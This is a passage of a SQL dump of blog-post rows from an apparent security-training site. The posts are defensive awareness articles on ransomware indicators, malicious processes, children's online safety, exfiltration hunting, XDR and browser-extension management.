environment. Training should emphasize recognizing phishing emails, avoiding suspicious links or unknown downloads, and reporting unusual activity to IT support immediately.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The threat of ransomware isn’t going away anytime soon, but understanding its mechanics, recognizing early warning signs, and implementing robust security measures can diminish its impact. By taking preventative steps like backing up data, updating software, and training users, you can stay ahead of potential threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is everyone’s responsibility. Whether you’re protecting personal data or safeguarding your organization, a proactive approach is key. Ransomware is sophisticated, but with vigilance and the right measures, you can stay one step ahead.</p>', '', NULL, NULL, 1, 'draft', '2023-08-01 02:27:57', '2026-01-12 21:41:44', 'Information Security', 'Everything about Ransomware', '', NULL),
(145, 'Teach children about cybersecurity', 'teach-children-about-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With technology playing an integral role in our daily lives, teaching children about cybersecurity has never been more crucial. Today’s children are growing up in a digital-first world where the internet is a constant companion, whether for education, entertainment, or social interactions. Yet, this increased exposure also comes with significant risks. Building cybersecurity literacy from an early age empowers children to stay safe and make responsible choices online, ensuring they are prepared to handle the challenges posed by the digital age.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Children Are Vulnerable to Cyber Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Children, by nature, are more susceptible to cyber threats than adults. They often lack the knowledge or experience required to identify potential dangers, making them easy targets for malicious activities like phishing, cyberbullying, or even online predators. Unlike adults, children may not fully comprehend the consequences of sharing personal information or clicking on suspicious links, leaving them exposed to identity theft, scams, or harmful interactions.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By educating children about cybersecurity, we equip them with the tools they need to protect themselves online. Making them aware of potential risks empowers them to make smarter decisions, such as avoiding unsafe behavior and recognizing suspicious activity.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Cybersecurity Education</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity education for children isn’t just about teaching them to avoid risks—it’s about fostering responsibility and critical thinking when navigating the digital world. Here are some key areas where cybersecurity knowledge can make a difference:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Developing Safe Online Habits:</strong></b> Children will learn to create strong passwords, recognize secure websites, and avoid giving out personal information unnecessarily.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Recognizing Cyber Threats:</strong></b> Understanding common online dangers, such as phishing scams, malware, and cyberbullying, helps children protect themselves and others.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Protecting Privacy:</strong></b> Teaching children how to adjust privacy settings on social media platforms and secure their devices ensures greater control over who can access their information.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By instilling these habits early, children are better prepared for the rapidly evolving digital environment—not just today but throughout their lives.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">A Lifelong Skill with Future Implications</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity literacy extends far beyond childhood. It is quickly becoming an essential life skill for personal safety, privacy, and even future career success. With workplaces increasingly relying on technology, the ability to recognize and mitigate cybersecurity risks will provide teenagers and young adults with a competitive edge in the job market.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Additionally, as advancements in technology blur the boundaries between online and offline life, cybersecurity knowledge is critical for safeguarding personal information. From financial transactions to cloud storage, every facet of modern life involves some level of digital interaction. Providing children with a foundation in cybersecurity ensures they’re not only protected but also adept at managing risks in a tech-driven world.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Teach Your Children About Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Teaching children about cybersecurity doesn’t have to be intimidating. With the right approach, these lessons can be integrated into daily conversations and practices, making them easy to understand and follow. Here are some actionable tips:</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Encourage Strong Passwords</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Teach children how to create strong passwords that include a mix of letters, numbers, and special characters. Explain the importance of keeping passwords private and avoiding common words or easily guessed phrases. Strong passwords are vital for keeping unauthorized users out of their accounts and personal data secure.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Discuss Online Risks</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Have open and age-appropriate conversations about potential dangers online. Explain the concept of cyberbullying and its effects, and provide examples of how online predators operate. Helping children understand these risks will encourage them to approach online interactions with caution.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Teach Them to Spot Phishing Scams</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Explain the dangers of phishing emails and messages, which are often used by scammers and hackers to steal information. Teach children not to click on links from unknown sources and to be skeptical of unexpected emails, especially if they ask for personal information.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Adjust Privacy Settings</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Show children how to use privacy settings on social media platforms and other online services. Help them restrict who can view their posts and personal details, ensuring that their online presence remains secure.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Keep Devices Updated</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Explain why software updates are essential for security. Encourage children to regularly update their devices and apps, emphasizing that these updates often include fixes to vulnerabilities that hackers could exploit.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Building a Safer Digital Future</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The investment in cybersecurity education ultimately leads to better technology use and resilience against threats. By teaching children about cybersecurity, parents and educators can play a pivotal role in shaping a generation that is digitally responsible, aware, and capable of making informed decisions online.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just about protecting devices; it’s about protecting futures. Introducing children to these principles early ensures they grow up equipped to handle the demands of an increasingly connected world—helping them thrive safely in both their personal and professional lives</p>', '', NULL, NULL, 1, 'draft', '2023-08-01 02:22:19', '2026-01-12 21:41:44', 'CyberKids', 'Teach children about cybersecurity', '', NULL),
(146, 'Protect Your Computer: Identifying and Eliminating Malicious Processes', 'processes-that-are-running-on-a-computer-can-be-malicious', '# Understanding and Combating Malicious Processes\n\nWith every click, download, and file opened, your computer is exposed to potential cyber threats. Malicious processes are a critical component of these threats, often running unnoticed in the background while jeopardizing your data and slowing down system performance. Understanding how to identify and address these processes is a vital step in protecting your system and maintaining smooth operations.\n\nThis guide dives into the telltale signs of malicious processes and provides actionable steps to safeguard your computer.\n\n## What are Malicious Processes?\n\nA malicious process is any active computer program running without your consent or for harmful purposes. These can come in various forms, including malware, spyware, ransomware, or even disguised system utilities. Often unseen, they can wreak havoc by consuming resources, stealing sensitive information, or giving attackers unauthorized access to your system.\n\n## Signs of a Malicious Process\n\nIdentifying malicious processes early can prevent extensive damage to your computer and data. Here are the key indicators to watch out for:\n\n### 1. High Usage of System Resources\n\nIf your computer is running slower than usual or frequently freezes, it might not just be old hardware—malicious processes often consume an unusual amount of CPU or memory. To check, open your Task Manager (Ctrl + Shift + Esc on Windows) and identify any program consuming excessive resources without a clear reason.\n\n### 2. Unknown or Suspicious Process Names\n\nSometimes, malicious processes disguise themselves as legitimate ones. Be especially wary of programs with names resembling critical system files, like \"svchost.exe.\" While legitimate files are essential for Windows, their names are commonly mimicked by malicious programs. If you spot an unrecognizable name in your Task Manager, take a moment to research it online using trusted sources.\n\n### 3. Unusual Network Activity\n\nMalicious processes often connect to remote servers. These connections may serve to send your personal data out or receive commands from an attacker. Using Task Manager or a network monitoring tool, keep an eye on ongoing network activity. If a process is sending or receiving significant amounts of data without your authorization, it’s a red flag.\n\n### 4. Unexpected File or Registry Changes\n\nHave you noticed new files or suspicious system changes? Certain malicious processes make unauthorized modifications to files, folders, or even the registry. These changes might not be immediately obvious, but monitoring tools or sudden irregularities in system settings can point to hidden threats.\n\n### 5. Running in the Background\n\nMany harmful processes operate in the background without any visible sign of their existence. You may not see a window or notification, but they continue to perform activities that could harm your computer. Regularly reviewing processes in the Task Manager can help detect these covert threats before they cause damage.\n\n## What to Do if You Suspect a Malicious Process\n\nNot all suspicious processes are necessarily harmful. However, if you identify one or more of the signs listed above, it’s important to proceed cautiously without abruptly terminating the process. Here’s what you should do next:\n\n1. **Research the Process**  \n   Search the process name online to see if it’s legitimate or potentially harmful. Forums and support sites can often shed light on questionable software.\n\n2. **Run a Full System Scan**  \n   Use updated antivirus software to perform a thorough scan of your computer. The scan will detect and remove many malicious programs automatically.\n\n3. **Seek Professional Assistance**  \n   If you\'re unsure about handling a suspicious process or the issue persists after running antivirus software, consider consulting a cybersecurity professional.\n\n4. **Avoid Hasty Actions**  \n   Avoid force-stopping processes unless you\'re confident they’re malicious; terminating critical system processes can cause your computer to malfunction.\n\n## Building a Multi-Layered Defense\n\nThe best way to deal with malicious processes is to prevent them entirely. A multi-layered security approach reduces the chances of malware slipping through while addressing potential threats more effectively. Here’s how to build this defense for your computer:\n\n- **Antivirus Software**  \n  Install and regularly update antivirus software to catch and remove malware before it takes hold.\n\n- **Firewalls**  \n  A firewall helps block unauthorized access to your system, acting as the first line of defense against external threats.\n\n- **Intrusion Detection Systems (IDS)**  \n  An IDS monitors your network for unusual activity and alerts you to any suspicious actions.\n\n- **Regular Security Updates**  \n  Always keep your operating system and software up to date. Security patches fix vulnerabilities that attackers might exploit.\n\n- **Monitoring Tools**  \n  Consider using tools like Malwarebytes, Process Explorer, or GlassWire to monitor and protect your system proactively.\n\n## Protect Your System, Protect Your Data\n\nMaintaining a secure computer is no longer optional—it’s a necessity as cyber threats grow more sophisticated. By staying vigilant, regularly inspecting your processes, and implementing a robust security strategy, you can ensure your system remains safe, fast, and reliable.\n\nDo you suspect a malicious process on your system? Start by using the steps outlined here, and explore advanced security tools and professional support if needed. Taking action today could save you from costly consequences tomorrow.', '', 'http://infoseclabs.io/uploads/1773250040055-60233776.jpg', 'Computer screen displaying a task manager with suspicious processes', 1, 'published', '2026-03-08 18:57:00', '2026-03-11 20:27:23', 'Information Security', 'Protect Your PC: Spot & Stop Malicious Processes', 'Learn to identify and eliminate malicious processes to safeguard your computer from cyber threats and ensure smooth performance.', 'malicious processes'),
(147, 'What are IoCs of RANSOMWARE on the endpoints?', 'what-are-iocs-of-ransomware-on-the-endpoints', '# Understanding Indicators of Compromise for Ransomware Detection\n\nRansomware attacks continue to be one of the most pressing cybersecurity threats of our time. These attacks, which encrypt files and demand a ransom for their release, can cripple businesses, compromise sensitive data, and incur substantial financial losses. The key to mitigating the damage caused by ransomware is early detection, which is where Indicators of Compromise (IoCs) come into play.\n\nIoCs are evidence-based clues that security teams can use to identify, track, and respond to potential intrusions or malware infections. Below, we explore some of the key IoCs for detecting ransomware on endpoints, helping businesses enhance their security posture and respond quickly to threats.\n\n## 1. File Hashes as Indicators of Compromise\n\nRansomware typically encrypts or modifies files on a compromised system, changing the files\' unique hash values. Hash values, such as MD5, SHA-1, or SHA-256, serve as digital fingerprints for files. When ransomware encrypts a file, its hash changes, and this unique change becomes a valuable IoC. Security teams can use these altered hash values to:\n\n- Pinpoint compromised or encrypted files.\n- Identify the extent of ransomware activity.\n- Strengthen response measures by isolating affected files.\n\n**Example:**  \nIf a security tool detects multiple files on an endpoint with hash values that deviate from their baseline, it could be early evidence of a ransomware attack.\n\n## 2. Suspicious Processes and Services\n\nAnother tell-tale sign of ransomware is the presence of unexpected processes or services running on an endpoint. Ransomware often executes itself as a process to perform actions such as scanning files, encrypting data, or communicating with external servers.\n\nMonitoring for suspicious or unrecognized processes and services is critical in detecting ransomware operations. Key red flags include:\n\n- Processes consuming unusually high CPU or memory.\n- Services attempting to access large numbers of files rapidly.\n- Processes with unusual names that don’t align with legitimate applications.\n\n**Example:**  \nA process named \"XYZupdate.exe\" running unexpectedly may trigger suspicion. Further analysis might reveal its true intent, such as encrypting local files.\n\n## 3. Unusual Network Connections\n\nRansomware often communicates with external control servers, commonly referred to as command-and-control (C2) servers. These communications are used to transmit instructions to the malicious software, exfiltrate data, or send ransom demands back to the attackers.\n\nBy carefully monitoring network traffic and connections, organizations can identify and block potential ransomware communications. Look out for:\n\n- Unusual outbound traffic patterns.\n- Connections to suspicious or unverified IPs or domains.\n- The use of uncommon network protocols or high numbers of outbound requests.\n\n**Example:**  \nIf an endpoint suddenly connects to an unfamiliar IP address in a foreign country and begins transferring encrypted data, it could indicate ransomware activity.\n\n## 4. Modified or New Registry Keys\n\nRansomware often modifies or creates new registry keys to ensure persistence on a compromised endpoint. Registry keys are integral to the operation of Windows systems, and malicious software may exploit them to:\n\n- Automatically execute upon system startup.\n- Run hidden processes.\n- Maintain access after other malware components have been removed.\n\nMonitoring registry changes provides an important layer of visibility into potentially malicious behavior.\n\n**Example:**  \nThe creation of a registry key under `HKEY_CURRENT_USER\\Software\\RandomName` to launch an unknown program could warrant further investigation.\n\n## 5. Unusual File Extensions\n\nMany ransomware variants add specific or unique file extensions to the original filenames they encrypt. These extensions are often clear indicators that a system has been compromised. For instance, if a file named `example.docx` is suddenly renamed to `example.docx.locked` or `example.docx.encrypted`, this is a strong indicator of a ransomware attack in progress.\n\nThese file extensions can serve as IoCs for identifying which ransomware strain is responsible for the attack. Security teams can look up these extensions in threat intelligence databases to confirm the ransomware type and determine a tailored response strategy.\n\n**Example:**  \nIf most files on an endpoint are found with extensions like `.darkweb` or `.paycrypt`, it identifies the nature of the infection and implies a ransomware attack specific to that strain.\n\n## Important Notes on IoCs\n\nIt’s essential to recognize that no IoC is one-size-fits-all. The specific IoCs for ransomware can vary based on:\n\n1. The type of ransomware deployed (e.g., WannaCry, LockBit, or DarkSide).\n2. The method of delivery (e.g., phishing emails, exploit kits, or remote access tools).\n\nTherefore, monitoring must be adaptive and integrated with up-to-date threat intelligence. Combining IoCs with behavior-based detection and proactive monitoring creates a robust defense against ransomware attacks.\n\n## Final Thoughts\n\nRansomware is a constantly evolving threat, but by closely monitoring Indicators of Compromise, organizations can increase their chances of detecting and responding to ransomware attacks before significant damage occurs. From analyzing file hashes to identifying suspicious processes, understanding these IoCs equips cybersecurity teams with the tools needed to protect systems, data, and workflows.\n\nIf your organization is looking to strengthen its ransomware defense, consider adopting advanced security solutions tailored to monitor these IoCs and provide real-time alerts. Early detection could be the difference between a minor security incident and a costly data breach.', '', 'http://infoseclabs.io/uploads/1773164194431-815349590.jpg', 'Endpoint security analysis for ransomware detection', 1, 'published', '2026-03-08 11:49:00', '2026-03-10 20:36:59', 'Information Security', 'Detecting Ransomware IoCs on Endpoints', 'Learn key IoCs for identifying ransomware on endpoints to enhance security and respond swiftly to threats.', 'Ransomware IoCs'),
(149, 'The Certificate Trap: Why 2026’s Cyber Threats Demand More Than Paper Skills', 'the-certificate-trap-why-2026-s-cyber-threats-demand-more-than-paper-skills', '# Welcome to 2026: The Age of Advanced Cyber Threats\n\nWe are in an era where AI-driven autonomous attacks can cripple systems in seconds, and polymorphic ransomware is stealthier than ever. Yet, thousands of aspiring cybersecurity professionals are still operating with a mindset from a decade ago: \"Get the certificate first, learn the job later.\"\n\nThis approach is broken.\n\nToday’s CISOs and SOC managers are less interested in the framed acronyms on your wall and more interested in what you can do behind a keyboard when the pressure is on. Theoretical knowledge is foundational, but \"digital muscle memory\" is what ensures survival on the defensive line.\n\n## Why Theory No Longer Suffices: The 2026 Perspective\n\nA cybersecurity textbook will tell you what a SIEM (Security Information and Event Management) tool is. It will not teach you what to do at 11:00 PM on a Friday when that tool is screaming with thousands of false positives, hiding one true indicator of compromise (IoC).\n\nThreat actors in 2026 are using machine learning to bypass static defenses. To defend against them, you cannot just \"know\"; you must be able to \"think\" like an attacker and wield your defensive tools like instruments. This capability cannot be read; it must be earned through practice, failure, and repetition in a safe environment.\n\n## Building Defensive \"Muscle Memory\"\n\nPilots don’t learn to fly just by reading manuals; they log hundreds of hours in simulators. Surgeons don\'t learn to operate just by watching videos; they practice.\n\nFor Blue Team professionals, it should be no different. Engaging with real-world scenarios on platforms like InfoSecLabs provides:\n\n- **Real-Time Pressure Management**: Learn to prioritize and act when the clock is ticking during a simulated breach.\n- **Tool Proficiency**: Gain hands-on experience configuring and utilizing industry-standard stacks (like Wazuh, ELK, or Velociraptor) with live data, not just static screenshots.\n- **Analytical Mindset Development**: Move beyond memorizing answers to analyzing data to answer the question, \"Why is this log entry anomalous?\"\n\n## Employers Are Saying: \"Show Me\"\n\nHiring processes have shifted radically. The interview question has changed from \"List the OSI layers\" to \"Walk me through how you analyzed and contained that novel Emotet variant last week.\"\n\nHaving \"Certified XYZ\" on your resume is good. Having a portfolio that says, \"I completed the \'Advanced Persistence Threat Detection\' lab on InfoSecLabs and broke the kill chain using these steps...\" sets you apart from 500 other applicants. This is your proven practical experience.\n\n## Time to Take the Wheel\n\nCertifications are valuable; they teach you the rules of the road. But driving in heavy traffic is an entirely different skill set. If you want to be a sought-after SOC analyst or cyber defense expert in 2026, you must step out of the theoretical world and into the practical one.\n\nGet behind the keyboard, spin up the VMs, and get your hands (virtually) dirty. Because the attackers never stop practicing.\n\n👉 Ready to prove your skills? Start your first real-world defensive engagement today with InfoSecLabs.io\'s free introductory scenarios. Don\'t just read about defense—do it.', '', 'http://infoseclabs.io/uploads/1770129692543-2358057.jpeg', NULL, 1, 'published', '2026-02-02 17:38:00', '2026-02-03 17:58:51', 'Information Security', 'Cybersecurity Career 2026: Hands-on Labs vs. Certifications', 'Hands-on cybersecurity training, SOC analyst skills 2026, practical InfoSec labs, Blue Team experience, cybersecurity certifications vs reality.', NULL),
(150, 'Detecting the Invisible: Hunting for AI-Enhanced Data Exfiltration in 2026', 'detecting-the-invisible-hunting-for-ai-enhanced-data-exfiltration-in-2026', '# The Evolution of Data Exfiltration: Detecting the Undetectable\n\nIn the early 2020s, data exfiltration was often noisy. Attackers would transmit gigabytes of data over common ports, triggering high-severity alerts in almost any decent Security Information and Event Management (SIEM) system.\n\nFast forward to 2026, and the game has changed. Today’s sophisticated threat actors are using AI-driven obfuscation to mimic your network’s \"heartbeat.\" They don\'t blast data anymore; they drip it out, bit by bit, disguised as legitimate Zoom traffic, cloud syncs, or even encrypted telemetry.\n\n## Catching the Invisible Thief\n\nAs a Blue Teamer, how do you catch a thief that looks exactly like a regular employee?\n\n### The Shift from Signatures to Behavior\n\nTraditional signature-based detection is ineffective for this type of attack. If the traffic looks like a standard HTTPS request to a known cloud provider, your firewall will allow it to pass.\n\nThe 2026 Security Operations Center (SOC) Analyst must rely on Behavioral Baseline Analysis. You aren\'t looking for \"evil\" strings anymore; you are looking for mathematical anomalies:\n\n- **The \"Long Tail\" Connection:** A single connection that stays open for 72 hours, transferring only 5KB every 10 minutes.\n- **Protocol Mismatch:** Traffic on Port 443 that doesn\'t follow the TLS handshake patterns expected from a browser.\n- **Geographic Deviations:** Data flowing to a CDN node that your company’s infrastructure has never interacted with before.\n\n### The \"Low and Slow\" AI Trick\n\nModern malware now uses local AI agents to analyze your network traffic before it even begins the exfiltration process. It \"learns\" when your peak hours are and hides its activity during those bursts. To catch this, you need to examine temporal patterns.\n\n## Practical Hunting Steps: Network Flow Analysis\n\nIf you suspect exfiltration, your first stop isn\'t the alerts—it\'s the raw Flow Logs.\n\n- **Filter by Duration:** Look for the longest-running connections.\n- **Analyze Entropy:** AI-encrypted exfiltration often has a higher entropy (randomness) than standard compressed files.\n- **Check Beaconing:** Use tools like Zeek or RITA to find rhythmic heartbeats that suggest an automated exfiltration script.\n\n## The Importance of Practice\n\nYou cannot learn to spot these subtle \"glitches in the matrix\" by reading a manual. You need to experience what \"normal\" looks like in a complex environment to recognize \"abnormal.\"\n\nAt InfoSecLabs.io, we’ve built scenarios that simulate these exact AI-driven exfiltration techniques. We provide you with the SIEM, the logs, and a compromised network. Your job is to find that one red thread in a sea of green.\n\n\nThe \"Invisible\" is only invisible if you aren\'t looking at the right patterns. In 2026, the best defense is a proactive hunter who understands that the most dangerous threats are the ones that look the most normal.\n\n👉 **Challenge Yourself:** Can you spot the leak? Dive into our SOC Lab on InfoSecLabs.io and put your hunting skills to the test.', '', 'http://infoseclabs.io/uploads/1770130588421-387627537.jpg', 'A network analyst detecting AI-driven data exfiltration in 2026', 1, 'published', '2026-02-03 09:52:00', '2026-02-03 17:57:36', 'Information Security', 'AI-Driven Threat Hunting: Detecting Stealthy Data Exfiltration', 'Discover advanced methods to detect AI-driven data exfiltration in 2026. Learn behavioral analysis and hunting techniques.', 'AI threat hunting, data exfiltration detection, SOC analyst 2026, behavioral analysis, network forensics, InfoSecLabs scenarios.'),
(151, 'Beyond the Dashboard: Mastering XDR for Proactive Threat Hunting in 2026', 'beyond-the-dashboard-mastering-xdr-for-proactive-threat-hunting-in-2026', '# The Evolution of Endpoint Security: Embracing XDR in 2026\n\nRemember the days when \"endpoint security\" simply meant installing an antivirus and hoping for the best? Those days are long gone. In 2026, the endpoint has become the new perimeter, and Extended Detection and Response (XDR) is the primary weapon in a SOC analyst\'s arsenal.\n\n## The Problem with Reactive Defense\n\nHowever, there\'s a problem. Too many analysts treat their expensive XDR platforms like glorified alert dashboards. They wait for a red light to flash, then react.\n\nIn a threat landscape dominated by living-off-the-land binaries (LOLBins) and fileless malware, reactive defense is a failing strategy. To be an effective Blue Teamer in 2026, you must stop merely watching your XDR and start driving it.\n\n## XDR: A Search Engine, Not Just an Alarm Bell\n\nThe true power of a modern XDR platform lies in its ability to query the real-time state of your entire fleet. Instead of waiting for an alert about a suspicious PowerShell script, a proactive hunter asks questions:\n\n- \"Show me all endpoints where powershell.exe was launched by winword.exe in the last 24 hours.\"\n- \"List all processes that have established a network connection to a non-standard port over the past hour.\"\n- \"Which user accounts have logged into more than five different hosts in under ten minutes?\"\n\nThese aren\'t alerts; they are hypotheses. Testing hypotheses is the core of threat hunting.\n\n## The \"R\" in XDR: Overcoming the Fear of Response\n\nThe most underutilized feature in many SOCs is the \"Live Response\" capability. The ability to remote into a compromised host, kill a malicious process, delete a registry key, or isolate the machine from the network with a single click is incredibly powerful—and terrifying for a junior analyst.\n\nWhat if you isolate the CEO\'s laptop by mistake during a critical meeting? This fear can paralyze action. The only way to overcome it is through practice in a consequence-free environment. You need to know exactly what happens when you push that \"Isolate Host\" button before you have to do it for real.\n\n## Integration is Everything\n\nIn 2026, XDR doesn\'t exist in a vacuum. It feeds your SIEM with high-fidelity data and receives automated response actions from your SOAR playbook. Understanding this ecosystem—how a signal from an endpoint can automatically trigger a firewall block at the network edge—is what separates a tool operator from a true security engineer.\n\n## Get Your Hands on the Controls\n\nReading about XDR capabilities in a whitepaper won\'t prepare you for a real-world ransomware outbreak moving laterally through your network. You need muscle memory. You need to know how to craft queries under pressure and execute response actions without hesitation.\n\nAt InfoSecLabs.io, we provide simulated enterprise environments equipped with modern XDR capabilities. Don\'t just look at the dashboard—take control of it.\n\n👉 Ready to Hunt? Step away from passive monitoring and dive into our \"XDR Hunter\" scenarios on InfoSecLabs.io today.', '', 'http://infoseclabs.io/uploads/1770259238252-359151907.jpg', NULL, 1, 'published', '2026-02-04 21:36:00', '2026-02-05 05:40:42', 'Information Security', 'Mastering XDR in 2026: Proactive Threat Hunting for SOC Analysts', NULL, 'XDR threat hunting, SOC analyst tools 2026, EDR vs XDR, proactive defense, live response, endpoint security labs.'),
(152, 'The Trojan Horse in Your Browser: A Comprehensive Guide to Managing Browser Extensions', 'the-trojan-horse-in-your-browser-a-comprehensive-guide-to-managing-browser-extensions', '# The Browser as the New Operating System\n\nIn 2026, the web browser is no longer just an application; it is the primary operating system for the modern enterprise. Almost every critical business function—from CRM and ERP to communication and code repositories—happens inside a browser tab. This shift has elevated humble browser extensions from simple convenience tools to powerful software with near-omnipresent access to your corporate data.\n\nAn extension that can \"read and change all your data on the websites you visit\" has the same level of access as a keylogger sitting on a terminal displaying sensitive customer PII. While many extensions boost productivity, others are silent data siphons, malware delivery mechanisms, or ticking supply-chain time bombs.\n\nFor the Blue Team, ignoring browser extensions is akin to leaving the front door wide open while securing the windows. This guide covers the risks, strategies, and toolkit needed to regain control of the corporate browser environment.\n\n## The Threat Landscape: Why \"Innocent\" Extensions Are Dangerous\n\nThe core problem is permission creep. To function, even legitimate extensions often require broad permissions that can be abused.\n\n### Data Exfiltration & Spyware\n\nA \"price tracker\" extension has legitimate reasons to read page content. However, a malicious version can just as easily scrape credentials from login forms, session tokens from cookies, or proprietary data displayed on an internal dashboard and send it to a C2 server.\n\n### The AI Assistant Risk (2026 Trend)\n\nThe explosion of \"AI writing assistants\" that live in the browser means employees are voluntarily granting third-party tools access to read everything they type and view—including confidential emails and strategic documents. Where does that data go for \"processing\"?\n\n### Supply Chain Attacks\n\nA developer builds a popular, legitimate extension and then sells it to a third party. The new owner pushes a malicious update—perhaps a cryptominer or adware—automatically infecting thousands of corporate endpoints overnight.\n\n### Malvertising & Browser Hijacking\n\nExtensions that inject unwanted ads, redirect search traffic, or modify web pages to phish for credentials.\n\n## The Strategy: A Framework for Control\n\nYou cannot simply block all extensions without causing a user revolt, nor can you allow a free-for-all. A mature organization needs a three-step approach:\n\n### Phase 1: Discovery (Visibility)\n\nYou can\'t protect what you can\'t see. You need to know exactly what extensions are installed across your entire fleet, down to the version number and the permissions they request.\n\n### Phase 2: Assessment (Risk Scoring)\n\nNot all extensions are equal. You must evaluate them based on:\n\n- **Permissions**: Does a color-picker need access to your clipboard and history? (Red flag).\n- **Developer Reputation**: Is it from a known vendor (e.g., Adobe, Okta) or an anonymous developer with a Gmail address?\n- **Update Frequency & Privacy Policy**: When was it last updated? Does it have a clear data handling policy?\n\n### Phase 3: Enforcement (Policy)\n\nImplement a tiered policy structure:\n\n- **Force-Install**: Mandatory security or productivity tools (e.g., password managers, ZTNA agents).\n- **Allowlist**: Pre-approved, vetted extensions that users can install freely.\n- **Blocklist**: Known malicious or high-risk extensions that are banned.\n- **Block All by Default**: The most secure posture, requiring users to request approval for any new extension.\n\n## The Toolkit: How to Implement Control\n\nIn 2026, managing extensions is done via centralized management platforms, not manual checks.\n\n### 1. The Foundation: MDM and UEM Platforms\n\nTools like Microsoft Intune, Jamf Pro, or Kandji are the primary enforcement mechanisms. They push configuration profiles to endpoints (Windows, macOS, Linux) that manage the browsers at an OS level.\n\n### 2. Browser-Native Management (Chrome & Edge)\n\nGoogle and Microsoft provide powerful cloud-based controls that integrate with your MDM.\n\n- **Chrome Enterprise Core**: Allows you to set policies for Chrome browsers on managed devices. You can define allow/block lists by extension ID, block extensions that request specific high-risk permissions (like audio capture), and force-install required apps.\n- **Microsoft Edge for Business**: Offers similar granular controls via Intune administrative templates, allowing you to manage add-ons and side-loading policies.\n\n### 3. Specialized Browser Security Platforms (BSP)\n\nFor high-security environments, standard policies might not be enough. Emerging Browser Security Platforms (like Island, Talon, or enterprise-grade extensions like Spin.ai) offer deeper visibility. They can perform behavioral analysis on extensions in real-time, 